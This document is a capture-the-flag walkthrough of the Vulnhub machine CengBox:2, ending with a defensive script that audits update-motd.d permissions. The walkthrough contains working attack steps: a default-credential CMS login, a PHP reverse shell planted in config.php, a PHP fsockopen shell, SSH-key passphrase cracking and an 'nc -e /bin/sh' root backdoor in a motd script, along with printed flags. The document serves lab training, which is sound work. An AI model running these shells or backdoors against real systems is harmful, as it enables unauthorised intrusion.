[VLN] CengBox:2

Today we are going to hack the Vulnhub machine called CengBox:2. You can download it from the following link: https://www.vulnhub.com/entry/cengbox-2,486/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.103
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-28 22:45 CEST
    Nmap scan report for cengbox.home (192.168.1.103)
    Host is up (0.00033s latency).
    Not shown: 65532 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_-rw-r--r--    1 0        0             209 May 23 07:21 note.txt
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:192.168.1.148
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 4
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA)
    |   256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA)
    |_  256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site Maintenance
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds
    We connect to the FTP server as the anonymous user to see if there is any clue.
    sml@Cassandra:~$ ftp 192.168.1.103
    Connected to 192.168.1.103.
    220 (vsFTPd 3.0.3)
    Name (192.168.1.103:sml): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0             209 May 23 07:21 note.txt
    226 Directory send OK.
    ftp> get note.txt
    local: note.txt remote: note.txt
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for note.txt (209 bytes).
    226 Transfer complete.
    209 bytes received in 0.00 secs (276.1862 kB/s)
    ftp>
    We read the note.txt file.
    sml@Cassandra:~$ cat note.txt
    Hey Kevin,

    I just set up your panel and used default password. Please change them before any hack. I try to move site to new domain which name is ceng-company.vm and also I created a new area for you.

    Aaron
    Reading the note, we see it mentions a domain, so we add ceng-company.vm to the /etc/hosts file. We brute-force subdomains to see whether we find anything interesting.
    sml@Cassandra:~$ gobuster vhost -u ceng-company.vm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
    We see that the domain admin.ceng-company.vm has shown up. We add it to /etc/hosts as well and take a look at the new domain.
    sml@Cassandra:~$ gobuster dir -u http://admin.ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,htm,txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://admin.ceng-company.vm
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,html,htm,txt
    [+] Timeout:        10s
    ===============================================================
    2020/05/29 19:58:03 Starting gobuster
    ===============================================================
    /server-status (Status: 403)
    /gila (Status: 301)
    ===============================================================
    2020/05/29 20:03:17 Finished
    ===============================================================
    We find the gila directory. Exploring it, we see that it is GilaCMS.
  • Low Shell
  • We visit http://admin.ceng-company.vm/gila/admin and it asks for a username and password. The note mentioned the user kevin, so, as a guess, we use kevin@ceng-company.vm as the username. For the password, after trying the usual ones, the right one is: admin. So the credentials are: kevin@ceng-company.vm/admin. We prepare a PHP reverse shell.
    sml@Cassandra:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
    sml@Cassandra:~$ mv php-reverse-shell.php shell.php
    sml@Cassandra:~$ nano shell.php   # edit it to set our IP and port
    In GilaCMS, we go to Content > File Manager and edit the config.php file so that it contains our reverse shell. Once it is saved, we start nc listening:
    sml@Cassandra:~$ nc -nlvp 1234
    And we visit: http://admin.ceng-company.vm/gila/config.php
    sml@Cassandra:~$ nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 55508
    Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
     11:47:36 up  7:48,  0 users,  load average: 0.00, 0.00, 0.08
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    Now that we are in, we look at what we can do.
    $ sudo -l
    Matching Defaults entries for www-data on cengbox:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User www-data may run the following commands on cengbox:
        (swartz) NOPASSWD: /home/swartz/runphp.sh
    We see that, through sudo, we can run a script as the user "swartz".
    $ cd /home/swartz
    $ ls -la
    total 44
    drwxr-xr-x 4 swartz swartz     4096 May 26 05:05 .
    drwxr-xr-x 4 root   root       4096 May 23 04:57 ..
    -rw------- 1 swartz swartz        1 May 26 07:16 .bash_history
    -rw-r--r-- 1 swartz swartz      220 Aug 31  2015 .bash_logout
    -rw-r--r-- 1 swartz swartz     3771 Aug 31  2015 .bashrc
    drwx------ 2 swartz swartz     4096 May 23 12:48 .cache
    drwx------ 2 swartz developers 4096 May 26 05:05 .gnupg
    -rw------- 1 swartz developers    1 May 26 07:16 .php_history
    -rw-r--r-- 1 swartz swartz      655 May 16  2017 .profile
    -rw------- 1 swartz developers    1 May 26 07:17 .viminfo
    -rwxr-xr-x 1 swartz swartz       20 May 26 03:17 runphp.sh
    We look at the code.
    $ cat runphp.sh
    #!/bin/bash
    php -a
    The script lets us run PHP interactively, so we will use it to get a shell. We start nc listening.
    nc -nlvp 5555
    And to get the shell...
    $ sudo -u swartz /home/swartz/runphp.sh
    Interactive mode enabled

    No entry for terminal type "unknown";
    using dumb terminal settings.
    $sock=fsockopen("192.168.1.148",5555); exec("/bin/sh -i <&3 >&3 2>&3");
    We get a shell as swartz :)
    sml@Cassandra:~$ nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 34744
    /bin/sh: 0: can't access tty; job control turned off
    $ id
    uid=1001(swartz) gid=1002(developers) groups=1002(developers)
    We see that swartz belongs to the developers group, and that group can read the SSH keys in the /home/mitnick directory.
    $ groups
    developers
    $ cd /home/mitnick
    $ ls -la
    total 48
    drwxr-x--- 4 mitnick developers 4096 May 25 13:56 .
    drwxr-xr-x 4 root    root       4096 May 23 04:57 ..
    -rw------- 1 mitnick mitnick       1 May 26 07:17 .bash_history
    -rw-r--r-- 1 mitnick mitnick     220 May 23 03:57 .bash_logout
    -rw-r--r-- 1 mitnick mitnick    3771 May 23 03:57 .bashrc
    drwx------ 2 mitnick mitnick    4096 May 23 04:01 .cache
    -rw------- 1 mitnick mitnick     505 May 23 06:21 .mysql_history
    -rw------- 1 mitnick mitnick       1 May 26 07:18 .php_history
    -rw-r--r-- 1 mitnick mitnick     655 May 23 03:57 .profile
    drwxr-x--- 2 mitnick developers 4096 May 25 14:08 .ssh
    -rw------- 1 mitnick mitnick       1 May 26 07:17 .viminfo
    -rw------- 1 mitnick mitnick      33 May 23 13:31 user.txt
    $ cd .ssh
    $ ls
    authorized_keys  id_rsa  id_rsa.pub
    $ ls -l
    total 12
    -rw-r--r-- 1 mitnick developers  397 May 25 14:08 authorized_keys
    -rw-r--r-- 1 mitnick developers 1766 May 25 14:07 id_rsa
    -rw-r--r-- 1 mitnick developers  397 May 25 14:07 id_rsa.pub
    We look at the id_rsa key.
    $ cat id_rsa
    -----BEGIN RSA PRIVATE KEY-----
    Proc-Type: 4,ENCRYPTED
    DEK-Info: AES-128-CBC,21425CA12E394F02C77645793C350D91
    [encrypted key material omitted]
    -----END RSA PRIVATE KEY-----
    We copy it to our machine and use john to crack the key and recover the passphrase.
    sml@Cassandra:~$ nano kevin.key
    sml@Cassandra:~$ chmod 600 kevin.key
    sml@Cassandra:~$ python /usr/share/john/ssh2john.py kevin.key > kevin.hash
    sml@Cassandra:~$ /usr/sbin/john kevin.hash --wordlist=rockyou.txt
    Using default input encoding: UTF-8
    Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
    Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
    Cost 2 (iteration count) is 1 for all loaded hashes
    Will run 4 OpenMP threads
    Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
    Press 'q' or Ctrl-C to abort, almost any other key for status
    legend           (kevin.key)
    Warning: Only 2 candidates left, minimum 4 needed for performance.
    1g 0:00:00:04 DONE (2020-05-29 22:31) 0.2173g/s 3117Kp/s 3117Kc/s 3117KC/s a6_123..*7¡Vamos!
    Session completed
    We see that the passphrase is legend. Knowing this, we log in.
  • user.txt
  • sml@Cassandra:~$ ssh -i kevin.key mitnick@192.168.1.103
    Enter passphrase for key 'kevin.key':

     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage

    176 packages can be updated.
    129 updates are security updates.

    Last login: Tue May 26 07:12:16 2020 from 192.168.0.14
    To run a command as administrator (user "root"), use "sudo <command>".
    See "man sudo_root" for details.

    mitnick@cengbox:~$ cat user.txt
    a10333b0b7c3f914e8c446fd8e9cd362
  • Privilege Escalation
  • We download pspy64 and nc onto the machine.
    mitnick@cengbox:~$ wget http://192.168.1.148/pspy64
    mitnick@cengbox:~$ chmod +x pspy64
    mitnick@cengbox:~$ wget http://192.168.1.148/nc
    mitnick@cengbox:~$ chmod +x nc
    We run pspy64 and, while it is running, log in again as mitnick from another terminal. When we do, we see several scripts being run as root (the ones in /etc/update-motd.d/*), and we have write permission on them.
    ---SNIP---
    2020/05/31 01:47:31 CMD: UID=0    PID=2348   | /bin/sh /etc/update-motd.d/91-release-upgrade
    2020/05/31 01:47:31 CMD: UID=0    PID=2347   | /bin/sh /etc/update-motd.d/91-release-upgrade
    2020/05/31 01:47:31 CMD: UID=0    PID=2346   | /bin/sh /etc/update-motd.d/91-release-upgrade
    2020/05/31 01:47:31 CMD: UID=0    PID=2345   | /bin/sh /etc/update-motd.d/91-release-upgrade
    2020/05/31 01:47:31 CMD: UID=0    PID=2349   | /bin/sh -e /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
    ---SNIP---
    Knowing this, we edit the file /etc/update-motd.d/00-header and add the following line to it:
    /home/mitnick/nc -e /bin/sh 192.168.1.148 3333
    In another terminal we start nc listening...
    sml@Cassandra:~$ nc -nlvp 3333
    Finally, in a third terminal, we log in again as the user mitnick. If everything went well, we get a root shell :)
    sml@Cassandra:~$ nc -nlvp 3333
    listening on [any] 3333 ...
    connect to [192.168.1.148] from (UNKNOWN) [192.168.1.103] 52438
    id
    uid=0(root) gid=0(root) groups=0(root)
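    The root shell above exists only because a non-root user could edit a script that pam_motd runs as root at every login. The following audit, added here as an example and not part of the original post, walks that directory and flags any script that is group- or world-writable or not owned by root; the output format and the assumption that file names contain no spaces are my own.

```sh
#!/bin/sh
# Audit the scripts that pam_motd runs as root on every login (by default the
# ones in /etc/update-motd.d). A file there that a non-root user can modify
# hands that user a root shell at the next login, which is what the walkthrough
# abuses via 00-header. Two findings are reported per file:
#   PERM  <file> <mode>   group- or world-writable
#   OWNER <file> <owner>  not owned by root
# Prints nothing and returns 0 when the directory is clean, 1 otherwise.
# Assumes file names without spaces; the output format is my own choice.
audit_motd_dir() {
    dir=$1
    found=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        # Parse the portable `ls -ld` line (mode is field 1, owner is field 3)
        # rather than depending on GNU stat/find extensions.
        set -- $(ls -ld "$f")
        mode=$1
        owner=$3
        # In the mode string, column 6 is the group write bit and column 9 the
        # world write bit; the trailing * tolerates an ACL/SELinux '+' or '.'.
        case $mode in
            ?????w????*|????????w?*)
                echo "PERM $f $mode"
                found=1 ;;
        esac
        if [ "$owner" != root ]; then
            echo "OWNER $f $owner"
            found=1
        fi
    done
    return $found
}

# Remediation once something is flagged (needs root):
#   chown root:root /etc/update-motd.d/*
#   chmod 755 /etc/update-motd.d/*

if [ -d /etc/update-motd.d ]; then
    audit_motd_dir /etc/update-motd.d
fi
```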
  • root.txt
  • cd /root
    ls
    root.txt
    cat root.txt
    [CengBox 2 ASCII-art banner]
    I would be grateful for your any feedback. Feel free to contact me on Twitter @arslanblcn_
    de89782fe4e8bf2198a022ae7f50613e
  • End
  • And with this we are root on the machine :)